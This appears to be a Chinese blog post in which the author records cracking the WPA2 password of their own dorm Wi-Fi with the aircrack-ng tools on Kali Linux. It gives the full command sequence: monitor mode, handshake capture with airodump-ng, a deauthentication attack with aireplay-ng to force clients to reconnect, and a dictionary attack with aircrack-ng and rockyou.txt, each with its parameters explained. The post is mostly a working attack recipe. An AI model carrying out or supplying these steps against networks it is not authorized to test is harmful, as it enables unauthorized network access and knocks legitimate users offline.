zoukankan      html  css  js  c++  java
  • jQueryrocket

    再看了一些资料之后,决定自己整理一下进行第一次测试,测试目标,自己宿舍的WIFI。教程仅供学习参考

    断开kali连接的wifi,并检查网卡状态

    airmon-ng

    开启无线网卡的监控模式

    airmon-ng start wlan0

    搜索wifi

    airodump-ng wlan0mon

    抓设备连接WiFi时的握手包

    airodump-ng -c 11 --bssid B8:F8:83:32:17:60 -w ~/ wlan0mon

     

    参数解释:

    -c 表示信道,目标路由器在哪个信道上就写哪个信道。

    --bssid 表示目标路由器的MAC地址

    -w 表示握手包存放的路径

    注:handshake握手包只有设备与路由器的wifi相连时才会产生,就是说如果没有设备相连那么就抓不到,那么就一直等待?一直等待是我们的风格,不能够啊!

    有一条断网命令,利用向连接wifi的设备发送反证包的原理,让设备断开wifi,断开之后该设备会自动再次连接WiFi,这时候就可以抓到handshake包。(因为是我自己的网,我能抓到,就不弄贴图了)

    aireplay-ng -0 10 -a B8:F8:83:32:17:60 -c 1C:91:48:A9:48:FD wlan0mon

    参数:

      -0表示deauthentication攻击

      10表示一次发送10个反证包

      -a表示目的路由器的MAC地址

      -c表示目标设备的MAC地址

    如果发了反证包还是抓不到,那就一次多发几个包,多发几次。抓到效果如下:

    抓到握手包之后可以Ctrl+C停止抓包,并关闭无线网卡的监控模式

    命令:

    airmon-ng stop wlan0mon

    monitor disable表示监控模式已关闭

    我们抓到的握手包就在这里:

    利用抓到的握手包进行破解密码

    aircrack-ng -a2 -b B8:F8:83:32:17:60 -w /usr/share/wordlists/rockyou.txt ~/*.cap

    参数:

      -a2表示WPA2的握手包

      -b表示目标路由器MAC

      -w表示字典所在路径

    最后一个参数是抓到的handshake

    用字典跑包,也就是所说的暴力破解,下面是成功的。

    但跑包也算是个运气活,运气得好,字典得强。上面用的字典是kali目录下自带的字典,有时候也会出现下面的情况,也就是跑包失败了。

     网上的教程到处都是。本教程只是为了记录自己的实战操作,教程仅供学习参考。

    不过说真的,像我这种不是很擅长linux的真是的太难搞了。

  • 相关阅读:
    eclipse新建工作空间后的常用设置
    Maven将代码及依赖打成一个Jar包的方式
    MemCache详细解读(转)
    memcached单机或热备的安装部署
    memcache的基本操作
    Java中int和String类型之间转换
    Linux中普通用户配置sudo权限(带密或免密)
    Java字符串中常用字符占用字节数
    java各种数据类型的数组元素的默认值
    validator
  • 原文地址:https://www.cnblogs.com/kaspar/p/11811903.html
Copyright © 2011-2022 走看看